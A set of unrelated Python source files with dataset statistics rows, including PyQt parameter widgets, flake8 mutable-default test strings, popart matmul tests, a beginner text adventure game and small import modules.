return self.__value_edit
def __check_form(self, txt: str):
try:
for i in txt.split(','):
if i not in self.value_range:
return False
except:
return False
return True
def text_changed(self):
if self.__check_form(self.__value_edit.text()):
self.value = self.__value_edit.text()
if self.value_changed is not None:
self.value_changed()
def get_value(self):
return self.value.split(',')
class EnumParam(ParamBase):
def __init__(self, value_range, default, describe='', name=None):
super().__init__()
self.type = 'Enum'
self.name = name
if type(value_range) is not tuple:
assert 'value_range is not tuple'
self.value_range = value_range
self.describe = describe
self.value = default
self.__combo_box = None
def to_widget(self):
# 水平方向
self.__combo_box = ComboBox()
if self.value is None:
self.value = self.value_range[0]
for v in self.value_range:
self.__combo_box.addItem(v)
# value_idx = self.value_range.index(self.value)
# self.__combo_box.setCurrentIndex(self.value_range.index(self.value))
self.__combo_box.setCurrentText(self.value)
self.__combo_box.currentIndexChanged.connect(self.selection_change)
if self.name is not None:
layout = QVBoxLayout()
label = LabelText(self.name)
layout.addWidget(label)
content_layout = QHBoxLayout()
# content_layout.addSpacing(INDENT)
content_layout.addWidget(self.__combo_box)
layout.addLayout(content_layout)
frame = ParamFrame()
frame.setLayout(layout)
return frame
else:
return self.__combo_box
def selection_change(self, i):
self.value = self.__combo_box.currentText()
if self.value_changed is not None:
self.value_changed()
def get_value(self):
if type(self.value) is str:
if self.value == 'True':
return True
if self.value == 'False':
return False
return self.value
class DictParam(ParamBase):
def __init__(self, children, describe='', name=None):
super().__init__()
self.type = 'Dict'
self.name = name
self.children = children
self.describe = describe
self.__param_group = None
def to_widget(self):
self.__param_group = QVBoxLayout()
self.__param_group.setDirection(QBoxLayout.TopToBottom)
for child_name in self.children:
child_layout = QVBoxLayout()
label = LabelText(child_name)
child_layout.addWidget(label)
child_item = self.children[child_name]
item_widget = child_item.to_widget()
child_layout.addWidget(item_widget)
self.__param_group.addLayout(child_layout)
# self.__param_group.addStretch()
frame = ParamFrame()
if self.name is not None:
layout = QVBoxLayout()
label = LabelText(self.name)
layout.addWidget(label)
self.__param_group.addSpacing(4)
content_layout = QHBoxLayout()
# content_layout.addSpacing(INDENT)
content_layout.addLayout(self.__param_group)
layout.addLayout(content_layout)
frame.setLayout(layout)
else:
frame.setLayout(self.__param_group)
return frame
def set_value_changed_fun(self, value_changed):
for child_name in self.children:
child_item = self.children[child_name]
child_item.set_value_changed_fun(value_changed)
def get_value(self):
result = dict()
for child_name in self.children:
child_item = self.children[child_name]
result[child_name] = child_item.get_value()
return result
class ChoiceParam(ParamBase):
def __init__(self, value_range, default, describe='', name=None):
super().__init__()
self.type = 'Choice'
self.name = name
if type(value_range) is not dict:
assert 'value_range is not dict'
self.value_range = value_range
self.describe = describe
self.value = default
self.__combo_box = None
self.__items = list()
self.__content_layout = None
def to_widget(self):
if self.value is None or self.value not in self.value_range:
self.value = list(self.value_range.keys())[0]
self.__combo_box = ComboBox()
self.__items = list()
for k in self.value_range:
self.__combo_box.addItem(k)
self.__items.append(self.value_range[k])
self.__combo_box.setCurrentText(self.value)
self.__combo_box.currentIndexChanged.connect(self.selection_change)
# self.__radio_group = QButtonGroup()
# item_layout = QVBoxLayout()
# item_layout.setDirection(QBoxLayout.TopToBottom)
# for choice_id, choice_item in enumerate(self.value_range):
# radio_layout = QHBoxLayout()
# radio_layout.setDirection(QBoxLayout.LeftToRight)
# item_widget = choice_item.to_widget()
# rb = QRadioButton(item_widget)
# if choice_id == self.value:
# rb.click()
# self.__radio_group.addButton(rb, choice_id)
# radio_layout.addWidget(rb)
# radio_layout.addWidget(item_widget)
# radio_layout.addStretch()
# item_layout.addLayout(radio_layout)
# item_layout.addStretch()
# for v in self.value_range:
# self.__combo_box.addItem(v)
# value_idx = self.value_range.index(self.value)
# self.__combo_box.setCurrentIndex(self.value_range.index(self.value))
# self.__combo_box.setCurrentText(self.value)
# self.__radio_group.buttonClicked.connect(self.selection_change)
frame = ParamFrame()
self.__content_layout = QVBoxLayout()
self.__content_layout.setContentsMargins(0, 0, 0, 0)
self.__content_layout.addWidget(self.__combo_box)
item = self.value_range[self.value]
if type(item) is not DefaultParam:
self.__content_layout.addWidget(item.to_widget())
if self.name is not None:
layout = QVBoxLayout()
label = LabelText(self.name)
layout.addWidget(label)
layout.addLayout(self.__content_layout)
frame.setLayout(layout)
else:
frame.setLayout(self.__content_layout)
return frame
# def selection_change(self):
# self.value = self.__radio_group.checkedId()
# if self.value_changed is not None:
# self.value_changed()
def selection_change(self):
self.value = self.__combo_box.currentText()
while self.__content_layout.count() > 1:
item = self.__content_layout.takeAt(1)
widget = item.widget()
if widget is not None:
widget.deleteLater()
else:
clear_layout(item.layout())
item = self.value_range[self.value]
if type(item) is not DefaultParam:
self.__content_layout.addWidget(item.to_widget())
if self.value_changed is not None:
self.value_changed()
def set_value_changed_fun(self, value_changed):
self.value_changed = value_changed
for k in self.value_range:
self.value_range[k].set_value_changed_fun(value_changed)
def get_value(self):
return self.value_range[self.value].get_value()
class MultiSelectParam(ParamBase):
def __init__(self, value_range, default, describe='', name=None):
super().__init__()
self.type = 'MultiSelect'
self.name = name
if type(value_range) is not tuple:
assert 'value_range is not tuple'
self.value_range = value_range
self.describe = describe
self.value = default
self.cb_list = list()
# self.__check_group = None
def to_widget(self):
if self.value is None or len(self.value) == 0:
self.value = [0]
self.cb_list = list()
item_layout = QVBoxLayout()
item_layout.setDirection(QBoxLayout.TopToBottom)
for select_id, select_value in enumerate(self.value_range):
cb = QCheckBox(str(select_value))
if select_id in self.value:
cb.setChecked(True)
cb.stateChanged.connect(self.selection_change)
self.cb_list.append(cb)
# self.__check_group.addButton(cb, select_id)
item_layout.addWidget(cb)
# item_layout.addStretch()
# for v in self.value_range:
# self.__combo_box.addItem(v)
# value_idx = self.value_range.index(self.value)
# self.__combo_box.setCurrentIndex(self.value_range.index(self.value))
# self.__combo_box.setCurrentText(self.value)
# self.__check_group.buttonClicked.connect(self.selection_change)
frame = ParamFrame()
if self.name is not None:
layout = QVBoxLayout()
label = LabelText(self.name)
layout.addWidget(label)
content_layout = QHBoxLayout()
# content_layout.addSpacing(INDENT)
content_layout.addLayout(item_layout)
layout.addLayout(content_layout)
frame.setLayout(layout)
else:
frame.setLayout(item_layout)
return frame
def is_empty(self):
for tmp_cb in self.cb_list:
if tmp_cb.isChecked():
return False
return True
def selection_change(self):
if self.is_empty():
self.cb_list[self.value[0]].setChecked(True)
else:
self.value = [cb_id for cb_id, tmp_cb in enumerate(self.cb_list) if tmp_cb.isChecked()]
if self.value_changed is not None:
self.value_changed()
def set_value_changed_fun(self, value_changed):
self.value_changed = value_changed
def get_value(self):
if len(self.value) > 1:
result = [self.value_range[v] for v in self.value]
return result
else:
return self.value_range[self.value[0]]
class DefaultParam(ParamBase):
def __init__(self, describe='', default=None, name='default'):
super().__init__()
self.type = 'None'
self.value = default
self.name = name
self.describe = describe
def to_widget(self):
return LabelText(self.name)
def set_value_changed_fun(self, value_changed):
pass
def get_value(self):
return self.value
| 35.318667
| 100
| 0.589037
| 3,067
| 26,489
| 4.785458
| 0.057711
| 0.144103
| 0.052463
| 0.020985
| 0.836343
| 0.813177
| 0.795599
| 0.766097
| 0.741909
| 0.724876
| 0
| 0.005688
| 0.316358
| 26,489
| 749
| 101
| 35.365821
| 0.804793
| 0.093322
| 0
| 0.773381
| 0
| 0
| 0.022733
| 0
| 0
| 0
| 0
| 0
| 0.02518
| 1
| 0.098921
| false
| 0.001799
| 0.003597
| 0.01259
| 0.19964
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
69a8d58d0a743cd8fe85a28f8ed1360c83100b6f
| 1,664
|
py
|
Python
|
tests/texts/mutables.py
|
Intsights/flake8-intsights
|
b3785a3be855e05090641696e0648486107dba72
|
[
"MIT"
] | 12
|
2020-02-18T17:47:57.000Z
|
2021-07-13T10:23:40.000Z
|
tests/texts/mutables.py
|
Intsights/flake8-intsights
|
b3785a3be855e05090641696e0648486107dba72
|
[
"MIT"
] | 7
|
2020-02-25T12:14:11.000Z
|
2020-12-01T08:14:58.000Z
|
tests/texts/mutables.py
|
Intsights/flake8-intsights
|
b3785a3be855e05090641696e0648486107dba72
|
[
"MIT"
] | 1
|
2020-07-01T15:49:28.000Z
|
2020-07-01T15:49:28.000Z
|
mutables_test_text_001 = '''
def function(
param,
):
pass
'''
mutables_test_text_002 = '''
def function(
param=0,
):
pass
'''
mutables_test_text_003 = '''
def function(
param={},
):
pass
'''
mutables_test_text_004 = '''
def function(
param=[],
):
pass
'''
mutables_test_text_005 = '''
def function(
param=tuple(),
):
pass
'''
mutables_test_text_006 = '''
def function(
param=list(),
):
pass
'''
mutables_test_text_007 = '''
def function(
param_one,
param_two,
):
pass
'''
mutables_test_text_008 = '''
def function(
param_one,
param_two=0,
):
pass
'''
mutables_test_text_009 = '''
def function(
param_one,
param_two={},
):
pass
'''
mutables_test_text_010 = '''
def function(
param_one,
param_two=[],
):
pass
'''
mutables_test_text_011 = '''
def function(
param_one,
param_two=list(),
):
pass
'''
mutables_test_text_012 = '''
def function(
param_one,
param_two=tuple(),
):
pass
'''
mutables_test_text_013 = '''
def function(
param_one,
param_two,
param_three,
):
pass
'''
mutables_test_text_014 = '''
def function(
param_one,
param_two,
param_three=0,
):
pass
'''
mutables_test_text_015 = '''
def function(
param_one,
param_two=0,
param_three={},
):
pass
'''
mutables_test_text_016 = '''
def function(
param_one,
param_two=[],
param_three={},
):
pass
'''
mutables_test_text_017 = '''
def function(
param_one={},
param_two=0,
param_three={},
):
pass
'''
mutables_test_text_018 = '''
def function(
param_one=0,
param_two=[],
param_three=0,
):
pass
'''
| 13.102362
| 28
| 0.602764
| 203
| 1,664
| 4.527094
| 0.152709
| 0.235038
| 0.313384
| 0.369967
| 0.849837
| 0.681175
| 0.591948
| 0.443961
| 0.4037
| 0.4037
| 0
| 0.048107
| 0.237981
| 1,664
| 126
| 29
| 13.206349
| 0.676656
| 0
| 0
| 0.761905
| 0
| 0
| 0.653846
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.142857
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
69dd78f17ed1ddc86c88f1f1a9aac67eedfb3638
| 99
|
py
|
Python
|
build/bdist.win-amd64/dumb/Program Files/WindowsApps/PythonSoftwareFoundation.Python.3.9_3.9.752.0_x64__qbz5n2kfra8p0/Lib/site-packages/trading_algorithm_framework/__init__.py
|
devonindustries/trading_algorithm_framework
|
b88dcac5aa4ad164e005d8426915dffcbfa75f5f
|
[
"MIT"
] | null | null | null |
build/bdist.win-amd64/dumb/Program Files/WindowsApps/PythonSoftwareFoundation.Python.3.9_3.9.752.0_x64__qbz5n2kfra8p0/Lib/site-packages/trading_algorithm_framework/__init__.py
|
devonindustries/trading_algorithm_framework
|
b88dcac5aa4ad164e005d8426915dffcbfa75f5f
|
[
"MIT"
] | null | null | null |
build/bdist.win-amd64/dumb/Program Files/WindowsApps/PythonSoftwareFoundation.Python.3.9_3.9.752.0_x64__qbz5n2kfra8p0/Lib/site-packages/trading_algorithm_framework/__init__.py
|
devonindustries/trading_algorithm_framework
|
b88dcac5aa4ad164e005d8426915dffcbfa75f5f
|
[
"MIT"
] | 1
|
2021-03-05T12:34:18.000Z
|
2021-03-05T12:34:18.000Z
|
from trading_algorithm_framework.portfolio import *
from trading_algorithm_framework.stock import *
| 49.5
| 51
| 0.888889
| 12
| 99
| 7
| 0.583333
| 0.261905
| 0.47619
| 0.690476
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.070707
| 99
| 2
| 52
| 49.5
| 0.913043
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
3864e2aa61bdb12eff257d3cbadcdb4edbbe581e
| 114
|
py
|
Python
|
python_gui_tkinter/KALU/GARBAGE1/SAFE28JUL/test.py
|
SayanGhoshBDA/code-backup
|
8b6135facc0e598e9686b2e8eb2d69dd68198b80
|
[
"MIT"
] | 16
|
2018-11-26T08:39:42.000Z
|
2019-05-08T10:09:52.000Z
|
python_gui_tkinter/KALU/GARBAGE1/SAFE28JUL/test.py
|
SayanGhoshBDA/code-backup
|
8b6135facc0e598e9686b2e8eb2d69dd68198b80
|
[
"MIT"
] | 8
|
2020-05-04T06:29:26.000Z
|
2022-02-12T05:33:16.000Z
|
python_gui_tkinter/KALU/GARBAGE1/SAFE28JUL/test.py
|
SayanGhoshBDA/code-backup
|
8b6135facc0e598e9686b2e8eb2d69dd68198b80
|
[
"MIT"
] | 5
|
2020-02-11T16:02:21.000Z
|
2021-02-05T07:48:30.000Z
|
from AppOperations import AppOperations as ao
from AppOperations import Rec
ao.reset_slno()
#print(Rec.timestmp())
| 28.5
| 45
| 0.824561
| 16
| 114
| 5.8125
| 0.625
| 0.365591
| 0.494624
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.096491
| 114
| 4
| 46
| 28.5
| 0.902913
| 0.184211
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
3886696ca34fbd88b3a7f251b2fea26bd6602dab
| 2,803
|
py
|
Python
|
tests/integration/operators_test/matmul_test_grouped.py
|
gglin001/popart
|
3225214343f6d98550b6620e809a3544e8bcbfc6
|
[
"MIT"
] | 61
|
2020-07-06T17:11:46.000Z
|
2022-03-12T14:42:51.000Z
|
tests/integration/operators_test/matmul_test_grouped.py
|
gglin001/popart
|
3225214343f6d98550b6620e809a3544e8bcbfc6
|
[
"MIT"
] | 1
|
2021-02-25T01:30:29.000Z
|
2021-11-09T11:13:14.000Z
|
tests/integration/operators_test/matmul_test_grouped.py
|
gglin001/popart
|
3225214343f6d98550b6620e809a3544e8bcbfc6
|
[
"MIT"
] | 6
|
2020-07-15T12:33:13.000Z
|
2021-11-07T06:55:00.000Z
|
# Copyright (c) 2019 Graphcore Ltd. All rights reserved.
import numpy as np
import popart
import torch
import pytest
from op_tester import op_tester
# `import test_util` requires adding to sys.path
import sys
from pathlib import Path
sys.path.append(Path(__file__).resolve().parent.parent)
import test_util as tu
def test_matmul_grouped_1(op_tester):
d1 = np.random.rand(2, 1, 4, 5, 1, 7, 8).astype(np.float32)
d2 = np.random.rand(2, 3, 1, 5, 6, 8, 9).astype(np.float32)
def init_builder(builder):
i1 = builder.addInputTensor(d1)
i2 = builder.addInputTensor(d2)
o = builder.aiOnnx.matmul([i1, i2])
builder.addOutputTensor(o)
return [o]
def reference(ref_data):
out = np.matmul(d1, d2)
return [out]
op_tester.run(init_builder, reference)
def test_matmul_grouped_2(op_tester):
d1 = np.random.rand(2, 1, 4, 5, 1, 7, 8).astype(np.float32)
d2 = np.random.rand(2, 3, 4, 5, 6, 8, 9).astype(np.float32)
def init_builder(builder):
i1 = builder.addInputTensor(d1)
i2 = builder.addInputTensor(d2)
o = builder.aiOnnx.matmul([i1, i2])
builder.addOutputTensor(o)
return [o]
def reference(ref_data):
out = np.matmul(d1, d2)
return [out]
op_tester.run(init_builder, reference)
def test_matmul_grouped_3(op_tester):
d1 = np.random.rand(4, 5, 1, 7, 8).astype(np.float32)
d2 = np.random.rand(2, 3, 1, 5, 6, 8, 9).astype(np.float32)
def init_builder(builder):
i1 = builder.addInputTensor(d1)
i2 = builder.addInputTensor(d2)
o = builder.aiOnnx.matmul([i1, i2])
builder.addOutputTensor(o)
return [o]
def reference(ref_data):
out = np.matmul(d1, d2)
return [out]
op_tester.run(init_builder, reference)
def test_matmul_grouped_4(op_tester):
d1 = np.random.rand(2, 1, 4, 5, 1, 7, 8).astype(np.float32)
d2 = np.random.rand(4, 5, 6, 8, 9).astype(np.float32)
def init_builder(builder):
i1 = builder.addInputTensor(d1)
i2 = builder.addInputTensor(d2)
o = builder.aiOnnx.matmul([i1, i2])
builder.addOutputTensor(o)
return [o]
def reference(ref_data):
out = np.matmul(d1, d2)
return [out]
op_tester.run(init_builder, reference)
def test_matmul_grouped_5(op_tester):
d1 = np.random.rand(3, 3, 3).astype(np.float32)
d2 = np.random.rand(3, 3, 4).astype(np.float32)
def init_builder(builder):
i1 = builder.addInputTensor(d1)
i2 = builder.addInputTensor(d2)
o = builder.aiOnnx.matmul([i1, i2])
builder.addOutputTensor(o)
return [o]
def reference(ref_data):
out = np.matmul(d1, d2)
return [out]
op_tester.run(init_builder, reference)
| 27.213592
| 63
| 0.635034
| 414
| 2,803
| 4.183575
| 0.152174
| 0.055427
| 0.069284
| 0.045035
| 0.843533
| 0.841224
| 0.81582
| 0.799076
| 0.799076
| 0.799076
| 0
| 0.063929
| 0.235462
| 2,803
| 102
| 64
| 27.480392
| 0.744284
| 0.036033
| 0
| 0.743243
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.202703
| false
| 0
| 0.108108
| 0
| 0.445946
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
38a0f41f0c84af26607b531cf8f1b897864509b1
| 11,793
|
py
|
Python
|
random_programs/cave_escape.py
|
poplol240/programs
|
73660555b866702091141a7c2231f96f18894cf5
|
[
"MIT"
] | null | null | null |
random_programs/cave_escape.py
|
poplol240/programs
|
73660555b866702091141a7c2231f96f18894cf5
|
[
"MIT"
] | null | null | null |
random_programs/cave_escape.py
|
poplol240/programs
|
73660555b866702091141a7c2231f96f18894cf5
|
[
"MIT"
] | null | null | null |
#93
#yay
#100% me
import random
hp = 3
hot_dog = ""
cake = ""
burger = ""
room = 1
monster = False
num1 = 0
action = 0
last_action = 0
print("You fell in a cave.")
print("It is deep and dark, you can't see anything.")
print("You found a flashlite in your bag.")
print("Your goal is to escape.")
print("You see 2 doors.")
def bag():
hot_dog ==True
cake == False
burger == True
def monster_hit():
random.randint(1,6)
if num1 == 1 or num1 == 2 or num1 == 3:
hp =- 1
monster == False
elif num1 == 4 or num1 == 5 or num1 == 6:
monster == False
if room == 2 or room == 4 or room == 5 or room == 8:
monster = True
action = input("chose what you do: 1 = enter door 1, 2 = enter door 2, 3 = check your bag")
if action == 1:
room == 2
elif action == 2:
room == 7
elif action == 3:
if hot_dog == True:
print("You have a hot dog")
elif cake == True:
print("you have a cake")
elif burger == True:
print("You have a burger")
while True:
if room == 2 or room == 4 or room == 8:
print("You entered a room.")
print("A monster attacks you!")
print("You see 2 doors.")
elif room == 5:
print("You entered a room.")
print("A monster attacks you!")
print("You see 1 door.")
elif room == 7:
print("You entered a room.")
print("You see 2 doors.")
elif room == 3 or room == 6 or room == 9:
print("You entered a room.")
print("You see 1 doors.")
elif room == 10:
print("You won!!!")
print("You survived with " + hp + ".")
print("☺☻☺☻")
if room == 1:
action = input("chose what you do: 1 = enter door 1, 2 = enter door 2, 3 = check your bag")
if action == "1":
room == 2
elif action == 2:
room == 7
elif action == 3:
if hot_dog == True:
print("You have a hot dog")
elif cake == True:
print("you have a cake")
elif burger == True:
print("You have a burger")
if room == 2 or room == 4 or room == 8:
print("You entered a room.")
print("A monster attacks you!")
print("You see 2 doors.")
elif room == 5:
print("You entered a room.")
print("A monster attacks you!")
print("You see 1 door.")
elif room == 7:
print("You entered a room.")
print("You see 2 doors.")
elif room == 3 or room == 6 or room == 9:
print("You entered a room.")
print("You see 1 doors.")
elif room == 10:
print("You won!!!")
print("You survived with " + hp + ".")
print("☺☻☺☻")
elif room == 2:
action = input("chose what you do: 1 = enter door 1, 2 = enter door 2, 3 = check your bag, 4 = fight the monster")
if action == 1:
room == 3
elif action == 2:
room == 4
elif action == 3:
if hot_dog == True:
print("You have a hot dog")
elif cake == True:
print("you have a cake")
elif burger ==True:
print("You have a burger")
elif action == 4:
monster_hit()
if room == 2 or room == 4 or room == 8:
print("You entered a room.")
print("A monster attacks you!")
print("You see 2 doors.")
elif room == 5:
print("You entered a room.")
print("A monster attacks you!")
print("You see 1 door.")
elif room == 7:
print("You entered a room.")
print("You see 2 doors.")
elif room == 3 or room == 6 or room == 9:
print("You entered a room.")
print("You see 1 doors.")
elif room == 10:
print("You won!!!")
print("You survived with " + hp + ".")
print("☺☻☺☻")
elif room == 3:
action = input("chose what you do: 1 = enter door 1, 2 = check your bag")
if action == 1:
room == 2
elif action == 2:
if hot_dog == True:
print("You have a hot dog")
elif cake == True:
print("you have a cake")
elif burger == True:
print("You have a burger")
if room == 2 or room == 4 or room == 8:
print("You entered a room.")
print("A monster attacks you!")
print("You see 2 doors.")
elif room == 5:
print("You entered a room.")
print("A monster attacks you!")
print("You see 1 door.")
elif room == 7:
print("You entered a room.")
print("You see 2 doors.")
elif room == 3 or room == 6 or room == 9:
print("You entered a room.")
print("You see 1 doors.")
elif room == 10:
print("You won!!!")
print("You survived with " + hp + ".")
print("☺☻☺☻")
elif room == 4:
action = input("chose what you do: 1 = enter door 1, 2 = enter door 2, 3 = check your bag, 4 = fight the monster")
if action == 1:
room == 5
elif action == 2:
room == 6
elif action == 3:
if hot_dog == True:
print("You have a hot dog")
elif cake == True:
print("you have a cake")
elif burger == True:
print("You have a burger")
elif action == 4:
monster_hit()
if room == 2 or room == 4 or room == 8:
print("You entered a room.")
print("A monster attacks you!")
print("You see 2 doors.")
elif room == 5:
print("You entered a room.")
print("A monster attacks you!")
print("You see 1 door.")
elif room == 7:
print("You entered a room.")
print("You see 2 doors.")
elif room == 3 or room == 6 or room == 9:
print("You entered a room.")
print("You see 1 doors.")
elif room == 10:
print("You won!!!")
print("You survived with " + hp + ".")
print("☺☻☺☻")
elif room == 5:
action = input("chose what you do: 1 = enter door 1, 2 = check your bag, 3 = fight the monster.")
if action == 1:
room == 4
elif action == 2:
if hot_dog == True:
print("You have a hot dog")
elif cake == True:
print("you have a cake")
elif burger == True:
print("You have a burger")
elif action == 3:
monster_hit()
if room == 2 or room == 4 or room == 8:
print("You entered a room.")
print("A monster attacks you!")
print("You see 2 doors.")
elif room == 5:
print("You entered a room.")
print("A monster attacks you!")
print("You see 1 door.")
elif room == 7:
print("You entered a room.")
print("You see 2 doors.")
elif room == 3 or room == 6 or room == 9:
print("You entered a room.")
print("You see 1 doors.")
elif room == 10:
print("You won!!!")
print("You survived with " + hp + ".")
print("☺☻☺☻")
elif room == 6:
action = input("chose what you do: 1 = enter door 1, 2 = check your bag")
if action == 1:
room == 10
elif action == 3:
if hot_dog == True:
print("You have a hot dog")
elif cake == True:
print("you have a cake")
elif burger == True:
print("You have a burger")
if room == 2 or room == 4 or room == 8:
print("You entered a room.")
print("A monster attacks you!")
print("You see 2 doors.")
elif room == 5:
print("You entered a room.")
print("A monster attacks you!")
print("You see 1 door.")
elif room == 7:
print("You entered a room.")
print("You see 2 doors.")
elif room == 3 or room == 6 or room == 9:
print("You entered a room.")
print("You see 1 doors.")
elif room == 10:
print("You won!!!")
print("You survived with " + hp + ".")
print("☺☻☺☻")
elif room == 7:
action = input("chose what you do: 1 = enter door 1, 2 = enter door 2, 3 = check your bag")
if action == 1:
room == 8
elif action == 2:
room == 9
elif action == 3:
if hot_dog == True:
print("You have a hot dog")
elif cake == True:
print("you have a cake")
elif burger == True:
print("You have a burger")
if room == 2 or room == 4 or room == 8:
print("You entered a room.")
print("A monster attacks you!")
print("You see 2 doors.")
elif room == 5:
print("You entered a room.")
print("A monster attacks you!")
print("You see 1 door.")
elif room == 7:
print("You entered a room.")
print("You see 2 doors.")
elif room == 3 or room == 6 or room == 9:
print("You entered a room.")
print("You see 1 doors.")
elif room == 10:
print("You won!!!")
print("You survived with " + hp + ".")
print("☺☻☺☻")
elif room == 8:
action = input("chose what you do: 1 = enter door 1, 2 = enter door 2, 3 = check your bag, 4 = fight the monster.")
if action == 1:
room == 4
elif action == 2:
room == 6
elif action == 3:
if hot_dog == True:
print("You have a hot dog")
elif cake == True:
print("you have a cake")
elif burger == True:
print("You have a burger")
elif action == 4:
monster_hit()
if room == 2 or room == 4 or room == 8:
print("You entered a room.")
print("A monster attacks you!")
print("You see 2 doors.")
elif room == 5:
print("You entered a room.")
print("A monster attacks you!")
print("You see 1 door.")
elif room == 7:
print("You entered a room.")
print("You see 2 doors.")
elif room == 3 or room == 6 or room == 9:
print("You entered a room.")
print("You see 1 doors.")
elif room == 10:
print("You won!!!")
print("You survived with " + hp + ".")
print("☺☻☺☻")
elif room == 9:
action = input("chose what you do: 1 = enter door 1, 2 = check your bag")
if action == 1:
room == 7
elif action == 2:
if hot_dog == True:
print("You have a hot dog")
elif cake == True:
print("you have a cake")
elif burger == True:
print("You have a burger")
if room == 2 or room == 4 or room == 8:
print("You entered a room.")
print("A monster attacks you!")
print("You see 2 doors.")
elif room == 5:
print("You entered a room.")
print("A monster attacks you!")
print("You see 1 door.")
elif room == 7:
print("You entered a room.")
print("You see 2 doors.")
elif room == 3 or room == 6 or room == 9:
print("You entered a room.")
print("You see 1 doors.")
elif room == 10:
print("You won!!!")
print("You survived with " + hp + ".")
print("☺☻☺☻")
| 30.871728
| 124
| 0.466378
| 1,582
| 11,793
| 3.490518
| 0.047408
| 0.192684
| 0.081673
| 0.1159
| 0.925752
| 0.922673
| 0.922673
| 0.922673
| 0.919051
| 0.919051
| 0
| 0.038756
| 0.402697
| 11,793
| 381
| 125
| 30.952756
| 0.739495
| 0.001018
| 0
| 0.878698
| 0
| 0.02071
| 0.311644
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.005917
| false
| 0
| 0.002959
| 0
| 0.008876
| 0.488166
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 8
|
38a2e63bd996eeeab5695f0dc1218ffdbded79f1
| 151
|
py
|
Python
|
distance.py
|
Thoritie/Variable-Delivery-Cost-Finder
|
18ff8c58ff01a1efd0c08fb4e45aa3c840b080b4
|
[
"MIT"
] | 4
|
2018-07-11T06:48:00.000Z
|
2021-09-18T22:51:26.000Z
|
distance.py
|
Thoritie/Variable-Delivery-Cost-Finder
|
18ff8c58ff01a1efd0c08fb4e45aa3c840b080b4
|
[
"MIT"
] | 3
|
2018-10-02T05:51:28.000Z
|
2018-10-19T01:19:03.000Z
|
distance.py
|
Thoritie/Variable-Delivery-Cost-Finder
|
18ff8c58ff01a1efd0c08fb4e45aa3c840b080b4
|
[
"MIT"
] | 5
|
2018-07-10T11:36:46.000Z
|
2018-10-03T02:11:01.000Z
|
import math
def getDistance(obj1, obj2):
return math.sqrt((obj1['x']-obj2['x'])*(obj1['x']-obj2['x']) + (obj1['y']-obj2['y'])*(obj1['y']-obj2['y']))
| 30.2
| 108
| 0.569536
| 25
| 151
| 3.44
| 0.4
| 0.116279
| 0.209302
| 0.232558
| 0.27907
| 0
| 0
| 0
| 0
| 0
| 0
| 0.071429
| 0.072848
| 151
| 4
| 109
| 37.75
| 0.542857
| 0
| 0
| 0
| 0
| 0
| 0.05298
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 8
|
c7f73e9db8ecb940c84e9e331e1022cc9ab114d9
| 169
|
py
|
Python
|
mechanics.py
|
YummyPotatoPie/Physicsly
|
b35f8cc639172359f1dca9c86a5932423984ee88
|
[
"MIT"
] | 2
|
2019-08-28T21:52:37.000Z
|
2019-08-28T22:30:53.000Z
|
mechanics.py
|
YummyPotatoPie/Physicsly
|
b35f8cc639172359f1dca9c86a5932423984ee88
|
[
"MIT"
] | null | null | null |
mechanics.py
|
YummyPotatoPie/Physicsly
|
b35f8cc639172359f1dca9c86a5932423984ee88
|
[
"MIT"
] | null | null | null |
from MechanicsModels.RotationalMotion import *
from MechanicsModels.Weight import *
from MechanicsModels.MechanicsEnergy import *
from MechanicsModels.Motion import *
| 42.25
| 47
| 0.846154
| 16
| 169
| 8.9375
